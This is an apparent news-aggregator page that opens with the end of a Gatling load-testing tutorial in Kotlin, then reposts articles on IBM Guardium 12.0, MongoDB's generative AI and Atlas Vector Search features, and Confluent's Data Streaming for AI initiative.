The Gatling scripts may be used to run the test, or the build tool may be used in which case the Scala plugin configuration may be removed to simplify the configuration.

The last example shows the Java DSL in Kotlin where the biggest change is that status().shouldBe(200) should be used instead of the status().is(200) in the Java example:

class BasicSimulationKotlin : Simulation() {

    val httpProtocol = http
    .baseUrl("http://localhost:8080");

    val scn = scenario("BasicSimulation")
        .repeat(5).on(
            exec(http("car").get("/car")
        	.check(status().shouldBe(200)))
        	.pause(1)
        	.exec(http("carpart")
        	.get("/carpart")
        	.check(status().shouldBe(200)))
    );

    init {
        setUp(
            scn.injectOpen(rampUsers(8).during(Duration.ofSeconds(10)))
        ).protocols(httpProtocol);
    }
}

The Gatling script may be used to run the tests. Alternatively, build plugins such as the Kotlin Maven Plugin can be used after specifying the location of the test scenario file in the testSourceDirectory:


    src/test/kotlin
    
        
            org.jetbrains.kotlin
            kotlin-maven-plugin
            ${kotlin.version}

            
                
                    compile
                    
                        compile
                    
                
                
                    test-compile
                    
                        test-compile
                    
                
            
        
        
            io.gatling
            gatling-maven-plugin
            ${gatling-maven-plugin.version}
        
    

More information can be found in the documentation where every functionality is explained with examples for Scala, Java and Kotlin.

About the Author

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


IBM Bolsters Database Security with Guardium 12.0 – IT Jungle

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

September 27, 2023

A new release of the Guardium database security software is expected to help customers detect insider threats faster and better comply with audit mandates, according to IBM. Guardium 12.0 also brings expanded support for databases and easier management in hybrid cloud environments, the company says.

IBM bought Guardium back in 2009 in order to improve its capability to monitor databases for possible security violations and SQL injection attacks. The security software helped to automate database security tasks by implementing a policy-based control layer for transactions as well as anomaly detection routines to single out potentially criminal behavior that would otherwise blend into the weeds.

That original mission is still front and center with Guardium Data Protection 12.0, which IBM announced last week and began shipping yesterday. According to IBM, the new product enables companies to detect insider threats faster, “with near real-time insights.” Enhancements to the product’s Active Threat Analytics, Risk Spotter, and real-time trust evaluator (RTTE) components are instrumental in speeding up the time to detection, the company says.

According to IBM, Guardium 12.0 also brings optimized data classification processes thanks to new catalog search rules and an “exclude” schema. Users should see more automation of the vulnerability assessment processes thanks to a new integration with ServiceNow to share vulnerability data.

On the product management front, users will benefit from better visibility into Guardium managed units and patching levels from the central manager components, as well as new health notifications for third-party software running on the Guardium appliance. This release also brings improved load balancing and traffic detection at cluster level, IBM says.

The new release brings data protection capabilities to several more databases, including Couchbase Server 7.1; DataStax Enterprise 6.8.20; EDB Postgres v15.2; Elasticsearch version 8.6.0; Microsoft SQL Server 2022; Microsoft SQL Server 2022 Azure; MongoDB Atlas Database with external S-TAP; MongoDB v6.0; Neo4j Graph Database v5.6; PostgreSQL 15; Redis v.7; Teradata v17.2; and Vertica Big Data Analytics v12. Google Big Query gets support for HTTP/2 traffic while Postgres gets support for “query rewrite.” It also supports the Watson Knowledge Catalog via user defined function, and support for Oracle database connection modules written in Python.

The product already supports all the latest versions of Db2 for IBM i, Z/OS, and Linux, Unix, and Windows (LUW). While it doesn’t run on IBM i, Guardium can protect data in Db2 for i. Guardium has supported Db2 for i since 2009.

For more info, see the IBM announcement.

RELATED STORIES

IBM Beefs Up Database Security with Guardium Buy

Guardium Adds DB2/400 Support to Database Security Tool

Tags: Tags: , , , , ,


Article originally posted on mongodb google news. Visit mongodb google news

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


MongoDB reveals new generative AI, vector search tools – TechTarget

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

MongoDB on Tuesday unveiled new generative AI capabilities designed to help developers more quickly and easily build applications.

Among them are natural language processing (NLP) capabilities that enable developers to interact with data without having to write code and new MongoDB Atlas Vector Search capabilities that help reduce errant model outputs.

MongoDB introduced the new features during MongoDB.local London, an in-person event for the vendor’s users.

Based in New York City, MongoDB is a database vendor that launched its NoSQL database in 2009 as  an alternative to relational databases.

Dating to the 1970s, relational databases sometimes struggle to discover relationships between data points, which is becoming even more difficult as organizations collect increasing amounts of data and the data they ingest increases in complexity.

As a result, alternatives have been developed.

Graph databases such as TigerGraph and Neo4j specialize in discovering relationships between data points and are quickly gaining popularity while document-based databases such as MongoDB and Couchbase offer platforms designed to work with large sets of distributed data.

In June at an event in New York, MongoDB revealed an initial set of generative AI capabilities. The features unveiled on Tuesday build on those initial features and move some from the development stage into preview.

New AI capabilities

Like most tech vendors, MongoDB has made generative AI a focal point of its product development since OpenAI’s launch of ChatGPT in November 2022 significantly advanced generative AI and large language model functionality.

In June, the vendor unveiled its first generative AI capabilities, including an extension of its partnership with Google Cloud that will enable developers to use the tech giant’s generative AI and LLM capabilities as they create applications in MongoDB Atlas.

Now, MongoDB is introducing specific generative AI tools that let users interact with data using natural language rather than code. They include the following:

  • Natural language query in MongoDB Compass that lets users generate queries and infuse data assets in applications.
  • Natural language visualization in MongoDB Atlas Charts so developers can create, share and embed visualizations.
  • An AI-powered chatbot in MongoDB Documentation that provides users with tutorials, code samples and reference libraries as they build applications with MongoDB.

The chatbot is now generally available, while the NLP capabilities in Compass and Atlas Charts are in preview.

The features are similar to those being developed by other data management and analytics vendors, according to Stephen Catanzano, an analyst at TechTarget’s Enterprise Strategy Group.

But they are nevertheless important given that they lessen the burden on data workers. In addition, whether one vendor’s NLP capabilities are stronger than another’s won’t really be known until all the tools are generally available, he noted.

“MongoDB, like other vendors, is integrating generative AI into their products to reduce the manual and repetitive tasks,” Catanzano said. “These functions are similar to what others are doing, but there may be more nuances once we can see the full implementation on how they are doing this versus others.”

Beyond NLP capabilities, MongoDB unveiled new AI-powered capabilities in MongoDB Relational Migrator that make it faster and easier for organizations to migrate data from relational and other database types to MongoDB. The vendor first made Relational Migrator generally available in June, and added capabilities now in preview automatically convert SQL queries to MongoDB Query API Syntax.

Meanwhile, improvements to MongoDB Atlas Vector Search — a tool also still in preview — are designed to reduce the frequency of AI hallucinations that plague generative AI and LLM outputs.

They include a dedicated data aggregation stage to filter results, accelerated indexing that shows metadata and other information that reveal data’s lineage and whether it can be trusted, and faster and easier access to streaming data to enable real-time analysis from generative AI models.

Because vector search can reduce AI hallucinations, MongoDB’s move to add functionality to Atlas Vector Search is critical, according to Catanzano.

He noted that vectors enable LLMs to identify similarity among data. Through identifying similar data, generative AI can learn from itself and return more accurate results.

“The most significant [new feature] is vector search,” Catanzano said. “Most database companies like MongoDB are adding this to support generative AI workloads. Vector search has a lot of use cases and is a must-have going forward for databases to play in the generative AI space.” 

Beyond the new capabilities in Atlas Vector Search, MongoDB unveiled an integration between Atlas Vector Search and data streaming specialist Confluent that enables developers to access streaming data for use in generative AI models.

Andrew Davidson, MongoDB’s SVP of products, said that the new capabilities in combination — which the vendor terms its intelligent developer experience — are designed to enable developers to build faster within MongoDB’s operational data layer.

Meanwhile, coming just three months after the vendor’s initial foray into generative AI, he said they represent progress from theory to practice.

“In June, we talked about how we were looking at [generative AI],” Davidson said. “Now, we’re launching a bunch of things. Back in June, we knew we wanted to do a lot of things but our plans weren’t specific. We knew we could do a bunch of things to modernize, and now we’re bringing it to life.”

Living on the edge

Beyond new generative AI capabilities — and those such as vector search that power generative AI — MongoDB also unveiled Atlas for the Edge.

Atlas for the Edge, now in preview, is a set of capabilities aimed at enabling users to deploy MongoDB applications where data is created, processed and stored rather than just the vendor’s database. In addition, the tool synchronizes an organization’s edge data with the rest of its data so the edge data is not isolated.

Davidson noted that data can be created and stored anywhere from an IoT sensor or point-of-sale system to a major cloud provider’s platform. Rather than force users to import that data into MongoDB to train models and inform other applications — including generative AI — the vendor is aiming to simplify development by bringing MongoDB to the data.

According to MongoDB, Atlas for the Edge enables customers to do the following:

  • Deploy MongoDB using varied infrastructures from on-premises servers to remote locations in warehouses or hospitals that are generally disconnected from other data sources so that data is connected and available for real-time analysis.
  • Run applications in locations with intermittent connectivity to prevent data loss when those locations are offline.
  • Integrate with generative AI and machine learning tools to enable development and deployment of generative AI capabilities directly in devices.
  • Store and process both real-time as well as batch data from IoT devices so it can be synchronized with other data in edge locations and used for predictive maintenance and anomaly detection.
  • Secure edge applications to ensure data privacy and regulatory compliance.

“We know that there’s more compute at the edge … where the business is happening,” Davidson said. “Now, we have the ability to have an edge server that synchronizes itself back up to Atlas.”

Catanzano likewise noted that the key aspect of Atlas for the Edge is that it provides a unified interface to enable development where business happens.

Previously, customers could build their own tools to deploy MongoDB in varied environments and then synchronize the data created in those varied environments. Now, MongoDB is doing that for them.

“They have expanded Atlas to the Edge with a single user interface that connects all edge devices, which was not easily done before this improvement,” Catanzano said. “It’s an important update and improvement for large scale deployments such as kiosks and IoT devices.”

Looking ahead, Davidson said MongoDB’s roadmap will center on adding performance and scalability while at the same time making its tools easier to use.

Beyond generative AI, time series analysis and stream processing are specific areas of focus. But at the core of the vendor’s product development planning is simplification.

Catanzano, meanwhile, said MongoDB’s focus on generative AI and streaming data is appropriate.

“They are moving quickly on generative AI, streaming data and important use cases,” he said.

Eric Avidon is a senior news writer for TechTarget Editorial and a journalist with more than 25 years of experience. He covers analytics and data management.

Article originally posted on mongodb google news. Visit mongodb google news

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


MongoDB Archives – insideBIGDATA

MMS Founder
MMS RSS

Posted on nosqlgooglealerts. Visit nosqlgooglealerts

MongoDB, Inc. (NASDAQ: MDB) announced new capabilities, performance improvements, and a data-streaming integration for MongoDB Atlas Vector Search that make it even faster and easier for developers to build generative AI applications. Organizations of all sizes have rushed to adopt MongoDB Atlas Vector Search as part of a unified solution to process data for generative AI applications since being announced in preview in June of this year.

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


New MongoDB Atlas Vector Search Capabilities Help Developers Build and Scale AI Applications

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

MongoDB, Inc. (NASDAQ: MDB) announced new capabilities, performance improvements, and a data-streaming integration for MongoDB Atlas Vector Search that make it even faster and easier for developers to build generative AI applications. Organizations of all sizes have rushed to adopt MongoDB Atlas Vector Search as part of a unified solution to process data for generative AI applications since being announced in preview in June of this year. MongoDB Atlas Vector Search has made it even easier for developers to aggregate and filter data, improving semantic information retrieval and reducing hallucinations in AI-powered applications. With new performance improvements for MongoDB Atlas Vector Search, the time it takes to build indexes is now significantly reduced by up to 85 percent to help accelerate application development. Additionally, MongoDB Atlas Vector Search is now integrated with fully managed data streams from Confluent Cloud to make it easier to use real-time data from a variety of sources to power AI applications. To learn more about MongoDB Atlas Vector Search, visit mongodb.com/products/platform/atlas-vector-search.

“It has been really exciting to see the overwhelmingly positive response to the preview version of MongoDB Atlas Vector Search as our customers eagerly move to incorporate generative AI technologies into their applications and transform their businesses—without the complexity and increased operational burden of ‘bolting on’ yet another software product to their technology stack. Customers are telling us that having the capabilities of a vector database directly integrated with their operational data store is a game changer for their developers,” said Sahir Azam, Chief Product Officer at MongoDB. “This customer response has inspired us to iterate quickly with new features and improvements to MongoDB Atlas Vector Search, helping to make building application experiences powered by generative AI even more frictionless and cost effective.”

Many organizations today are on a mission to invent new classes of applications that take advantage of generative AI to meet end-user expectations. However, the large language models (LLMs) that power these applications require up-to-date, proprietary data in the form of vectors—numerical representations of text, images, audio, video, and other types of data. Working with vector data is new for many organizations, and single-purpose vector databases have emerged as a short-term solution for storing and processing data for LLMs. However, adding a single-purpose database to their technology stack requires developers to spend valuable time and effort learning the intricacies of developing with and maintaining each point solution. For example, developers must synchronize data across data stores to ensure applications can respond in real time to end-user requests, which is difficult to implement and can significantly increase complexity, cost, and potential security risks. Many single-purpose databases also lack the flexibility to run as a managed service on any major cloud provider for high performance and resilience, severely limiting long-term infrastructure options. Because of these challenges, organizations from early-stage startups to established enterprises want the ability to store vectors alongside all of their data in a flexible, unified, multi-cloud developer data platform to quickly deploy applications and improve operational efficiency. 

MongoDB Atlas Vector Search addresses these challenges by providing the capabilities needed to build generative AI applications on any major cloud provider for high availability and resilience with significantly less time and effort. MongoDB Atlas Vector Search provides the functionality of a vector database integrated as part of a unified developer data platform, allowing teams to  store and process vector embeddings alongside virtually any type of data to more quickly and easily build generative AI applications. Dataworkz, Drivly, ExTrac, Inovaare Corporation, NWO.ai, One AI, VISO Trust, and many other organizations are already using MongoDB Atlas Vector Search in preview to build AI-powered applications for reducing public safety risk, improving healthcare compliance, surfacing intelligence from vast amounts of content in multiple languages, streamlining customer service, and improving corporate risk assessment. The updated capabilities for MongoDB Atlas Vector Search further accelerate generative AI application development:

  • Increase the accuracy of information retrieval for generative AI applications: Whether personalized movie recommendations, quick responses from chatbots for customer service, or tailored options for food delivery, application end-users today expect accurate, up-to-date, and highly engaging experiences that save them time and effort. Generative AI is helping developers deliver these capabilities, but the LLMs powering applications can hallucinate (i.e., generate inaccurate information that is not useful) because they lack the necessary context to provide relevant information. By extending MongoDB Atlas’s unified query interface, developers can now create a dedicated data aggregation stage with MongoDB Atlas Vector Search to filter results from proprietary data and significantly improve the accuracy of information retrieval to help reduce LLM hallucinations in applications.
  • Accelerate data indexing for generative AI applications: Generating vectors is the first step in preparing data for use with LLMs. Once vectors are created, an index must be built for the data to be efficiently queried for information retrieval—and when data changes or new data is available, the index must then be updated. The unified and flexible document data model powering MongoDB Atlas Vector Search allows operational data, metadata, and vector data to be seamlessly indexed in a fully managed environment to reduce complexity. With new performance improvements, the time it takes to build an index with MongoDB Atlas Vector Search is now reduced by up to 85 percent to help accelerate developing AI-powered applications.
  • Use real-time data streams from a variety of sources for AI-powered applications: Businesses use Confluent Cloud’s fully managed, cloud-native data streaming platform to power highly engaging, responsive, real-time applications. As part of the Connect with Confluent partner program, developers can now use Confluent Cloud data streams within MongoDB Atlas Vector Search as an additional option to provide generative AI applications ground-truth data (i.e. accurate information that reflects current conditions) in real time from a variety of sources across their entire business. Configured with a fully managed connector for MongoDB Atlas, developers can make applications more responsive to changing conditions and provide end user results with greater accuracy.

Organizations Already Innovating with MongoDB Atlas Vector Search in Preview

Dataworkz enables enterprises to harness the power of LLMs on their own proprietary data by combining data, transformations, and AI into a single experience to produce high-quality, LLM-ready data. “Our goal is to accelerate the creation of AI applications with a product offering that unifies data, processing, and machine learning for business analysts and data engineers,” said Sachin Smotra, CEO and co-founder of Dataworkz. “Leveraging the power of MongoDB Atlas Vector Search has allowed us to enable semantic search and contextual information retrieval, vastly improving our customers’ experiences and providing more accurate results. We look forward to continuing using Atlas Vector Search to make retrieval-augmented generation with proprietary data easier for highly relevant results and driving business impact for our customers.” 

Drivly provides commerce infrastructure for the automotive industry to programmatically buy and sell vehicles through simple APIs. “We are using AI embeddings and Atlas Vector Search to go beyond full-text search with semantic meaning, giving context and memory to generative AI car-buying assistants,” said Nathan Clevenger, Founder and CTO at Drivly. “We are very excited that MongoDB has added vector search capabilities to Atlas, which greatly simplifies our engineering efforts.”

ExTrac draws on thousands of data sources identified by domain experts, using AI-powered analytics to locate, track, and forecast both digital and physical risks to public safety in real-time. “Our domain experts find and curate relevant streams of data, and then we use AI to anonymize and make sense of it at scale. We take a base model and fine-tune it with our own labeled data to create domain-specific models capable of identifying and classifying threats in real-time.” said Matt King, CEO of ExTrac. “Atlas Vector Search is proving to be incredibly powerful across a range of tasks where we use the results of the search to augment our LLMs and reduce hallucinations. We can store vector embeddings right alongside the source data in a single system, enabling our developers to build new features way faster than if they had to bolt-on a standalone vector database—many of which limit the amount of data that can be returned if it has meta-data attached to it. Because the flexibility of MongoDB’s document data model allows us to land, index, and analyze data of any shape and structure—no matter how complex—we are now moving beyond text to vectorize images and videos from our archives dating back over a decade. Being able to query and analyze data in any modality will help us to better model trends, track evolving narratives, and predict risk for our customers.”

Inovaare Corporation is a leading provider of AI-powered compliance automation solutions for healthcare payers. “At Inovaare Corporation, we believe that healthcare compliance is not just about meeting regulations but transforming how healthcare payers excel in the entire compliance lifecycle. We needed a partner with the technological prowess and one who shares our vision to pioneer the future of healthcare compliance,” said Mohar Mishra, CTO and Co-Founder at Inovaare Corporation. “MongoDB’s robust data platform, known for its scalability and agility, perfectly aligns with Inovaare’s commitment to providing healthcare payers with a unified, secure, and AI-powered compliance operations platform. MongoDB’s innovative Atlas Vector Search powers the reporting capabilities of our products. It allows us to deliver context-aware compliance guidance and real-time data-driven insights.”

NWO.ai is a premier AI-driven Consumer Intelligence platform helping Fortune 500 brands bring new products to market. “In today’s rapidly evolving digital age, the power of accurate and timely information is paramount,” said Pulkit Jaiswal, Cofounder of NWO.ai. “At NWO.ai, our flagship offering, Worldwide Optimal Policy Response (WOPR), is at the forefront of intelligent diplomacy. WOPR harnesses the capabilities of AI to navigate the vast oceans of global narratives, offering real-time insights and tailored communication strategies. This not only empowers decision-makers but also provides a vital counterbalance against AI-engineered disinformation. We’re thrilled to integrate Atlas Vector Search into WOPR, enhancing our ability to instantly search and analyze embeddings for our dual-use case. It’s an exciting synergy, and we believe it’s a testament to the future of diplomacy in the digital age.”

One AI is a platform that offers AI Agents, Language Analytics, and APIs, enabling seamless integration of accurate, production-ready language capabilities into products and services. “Our hero product – OneAgent – facilitates trusted conversations through AI agents that operate strictly upon company-sourced content, secured with built-in fact-checking,” said Amit Ben, CEO and Founder of One AI. “With MongoDB Atlas, we’re able to take source customer documents, generate vector embeddings from them that we then index and store in MongoDB Atlas Vector Search. Then, when a customer has a question about their business and asks one of our AI agents, Atlas Vector Search will provide the chatbot with the most relevant data and supply customers with the most accurate answers. By enabling semantic search and information retrieval, we’re providing our customers with an improved and more efficient experience.”

VISO Trust puts reliable, comprehensive, actionable vendor security information directly in the hands of decision-makers who need to make informed risk assessments. “At VISO Trust, we leverage innovative technologies to continue our growth and expansion in AI and security. Atlas Vector Search, combined with the efficiency of AWS and Terraform integrations, has transformed our platform,” said Russell Sherman, Cofounder and CTO at VISO Trust. “With Atlas Vector Search, we now possess a battle-tested vector and metadata database, refined over a decade, effectively addressing our dense retrieval requirements. There’s no need to deploy a new database, as our vectors and artifact metadata can be seamlessly stored alongside each other.”

Sign up for the free insideBIGDATA newsletter.

Join us on Twitter: https://twitter.com/InsideBigData1

Join us on LinkedIn: https://www.linkedin.com/company/insidebigdata/

Join us on Facebook: https://www.facebook.com/insideBIGDATANOW

Article originally posted on mongodb google news. Visit mongodb google news

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


Confluent’s Data Streaming for AI initiative aims to boost AI app development | InfoWorld

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

Managed Apache Kafka service provider Confluent has launched  a new initiative, dubbed Data Streaming for AI, in order to help enterprises develop applications based on real-time data, including generative AI  use cases.

The premise of the initiative is based on Confluent’s real-time streaming data engine that will allow enterprises to make real-time contextual inferences on curated, governed, trustworthy data. These inferences can be later streamed to vector databases, AI-powered applications, and  any other AI-based systems.

In order to enable enterprise users to connect to various vector databases with contextual data, Confluent has partnered with MongoDB, Pinecone, Rockset, Weaviate, and Zilliz.

Vector databases are especially important as they can store, index, and augment large data sets in formats that AI technologies like LLMs require,” the company said in a news announcement, adding that these integrations can be used via Confluent Cloud’s fully managed data streams.

The company is expected to add more such partners in the coming months via its Connect with Confluent program.

The company is also partnering with cloud service providers, such as Google Cloud and Microsoft Azure, in order to develop integrations, proof of concepts and go-to-market strategies around AI.

“Confluent plans to leverage Google Cloud’s generative AI capabilities to improve business insights and operational efficiencies for retail and financial services customers,” it said. In addition, the company is  planning to create a Microsoft Copilot template to enable  AI assistants to perform business transactions and provide real-time updates.

Confluent AI Assistant to provide suggestions, generate code

In order to provide suggestions and generate code, the company is offering  a Confluent AI Assistant, which can be accessed via the Confluent Cloud Console.

The AI-based assistant can help teams get contextual answers they need to speed up engineering innovations on Confluent, the company said, adding that the assistant can also be used to generate code.

“The assistant provides responses by combining publicly available information, such as Confluent documentation, with contextual customer information to provide specific, timely responses,” the company said.

The Confluent AI assistant is expected to be made available in 2024 at no additional cost, a company spokesperson said.

Further, the company said that it will add a series of updates to its newly released Flink service for Confluent Cloud that brings AI capabilities to Flink SQL.

Next read this:

Article originally posted on mongodb google news. Visit mongodb google news

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.


New MongoDB Atlas Vector Search Capabilities Help Developers Build and Scale AI … – Datanami

MMS Founder
MMS RSS

Posted on mongodb google news. Visit mongodb google news

LONDON, Sept. 26, 2023 — MongoDB, Inc. today at MongoDB.local London announced new capabilities, performance improvements, and a data-streaming integration for MongoDB Atlas Vector Search that make it even faster and easier for developers to build generative AI applications.

Organizations of all sizes have rushed to adopt MongoDB Atlas Vector Search as part of a unified solution to process data for generative AI applications since being announced in preview in June of this year. MongoDB Atlas Vector Search has made it even easier for developers to aggregate and filter data, improving semantic information retrieval and reducing hallucinations in AI-powered applications. With new performance improvements for MongoDB Atlas Vector Search, the time it takes to build indexes is now significantly reduced by up to 85 percent to help accelerate application development.

Additionally, MongoDB Atlas Vector Search is now integrated with fully managed data streams from Confluent Cloud to make it easier to use real-time data from a variety of sources to power AI applications. To learn more about MongoDB Atlas Vector Search, visit this site.

“It has been really exciting to see the overwhelmingly positive response to the preview version of MongoDB Atlas Vector Search as our customers eagerly move to incorporate generative AI technologies into their applications and transform their businesses—without the complexity and increased operational burden of ‘bolting on’ yet another software product to their technology stack. Customers are telling us that having the capabilities of a vector database directly integrated with their operational data store is a game changer for their developers,” said Sahir Azam, Chief Product Officer at MongoDB. “This customer response has inspired us to iterate quickly with new features and improvements to MongoDB Atlas Vector Search, helping to make building application experiences powered by generative AI even more frictionless and cost effective.”

Many organizations today are on a mission to invent new classes of applications that take advantage of generative AI to meet end-user expectations. However, the large language models (LLMs) that power these applications require up-to-date, proprietary data in the form of vectors—numerical representations of text, images, audio, video, and other types of data. Working with vector data is new for many organizations, and single-purpose vector databases have emerged as a short-term solution for storing and processing data for LLMs.

However, adding a single-purpose database to their technology stack requires developers to spend valuable time and effort learning the intricacies of developing with and maintaining each point solution. For example, developers must synchronize data across data stores to ensure applications can respond in real time to end-user requests, which is difficult to implement and can significantly increase complexity, cost, and potential security risks.

Many single-purpose databases also lack the flexibility to run as a managed service on any major cloud provider for high performance and resilience, severely limiting long-term infrastructure options. Because of these challenges, organizations from early-stage startups to established enterprises want the ability to store vectors alongside all of their data in a flexible, unified, multi-cloud developer data platform to quickly deploy applications and improve operational efficiency.

MongoDB Atlas Vector Search addresses these challenges by providing the capabilities needed to build generative AI applications on any major cloud provider for high availability and resilience with significantly less time and effort. MongoDB Atlas Vector Search provides the functionality of a vector database integrated as part of a unified developer data platform, allowing teams to store and process vector embeddings alongside virtually any type of data to more quickly and easily build generative AI applications. Dataworkz, Drivly, ExTrac, Inovaare Corporation, NWO.ai, One AI, VISO Trust, and many other organizations are already using MongoDB Atlas Vector Search in preview to build AI-powered applications for reducing public safety risk, improving healthcare compliance, surfacing intelligence from vast amounts of content in multiple languages, streamlining customer service, and improving corporate risk assessment.

About MongoDB Atlas

MongoDB Atlas is the leading multi-cloud developer data platform that accelerates and simplifies building applications with data. MongoDB Atlas provides an integrated set of data and application services in a unified environment that enables development teams to quickly build with the performance and scale modern applications require. Tens of thousands of customers and millions of developers worldwide rely on MongoDB Atlas every day to power their business-critical applications. To get started with MongoDB Atlas, visit mongodb.com/atlas.

About MongoDB

Headquartered in New York, MongoDB’s mission is to empower innovators to create, transform, and disrupt industries by unleashing the power of software and data. Built by developers, for developers, our developer data platform is a database with an integrated set of related services that allow development teams to address the growing requirements for today’s wide variety of modern applications, all in a unified and consistent user experience. MongoDB has tens of thousands of customers in over 100 countries. The MongoDB database platform has been downloaded hundreds of millions of times since 2007, and there have been millions of builders trained through MongoDB University courses. To learn more, visit mongodb.com.


Source: MongoDB

Article originally posted on mongodb google news. Visit mongodb google news

Subscribe for MMS Newsletter

By signing up, you will receive updates about our latest information.

  • This field is for validation purposes and should be left unchanged.